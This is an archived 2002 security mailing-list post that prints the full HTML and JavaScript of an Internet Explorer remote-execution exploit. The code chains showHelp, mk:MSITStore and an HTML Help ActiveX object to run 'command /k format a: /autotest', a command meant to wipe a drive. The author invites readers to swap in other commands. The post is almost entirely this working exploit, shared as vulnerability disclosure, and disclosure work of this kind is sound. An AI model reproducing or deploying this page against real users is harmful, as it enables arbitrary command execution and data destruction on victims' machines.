|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Gossi The Dog (gossi_at_lab6.com)
Date: Thu Nov 14 2002 - 05:35:10 CST
FYI, the HTML code is;
------------------------------------------------------------------------
<html>
<head>
</head>
<script LANGUAGE="JavaScript">
prog = 'command';
args = '/k format a: /autotest';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:
MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();c3.Click();");
close();
}
</script>
<body>
<h1>Testing IE Execute Exploit</h1>
</body>
</html>
-----------------------------------------------------------------------
Change 'args' to a different command (/autotest doesn't work well on
Windows 2000, for example).
Oh dear.
Gossi
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]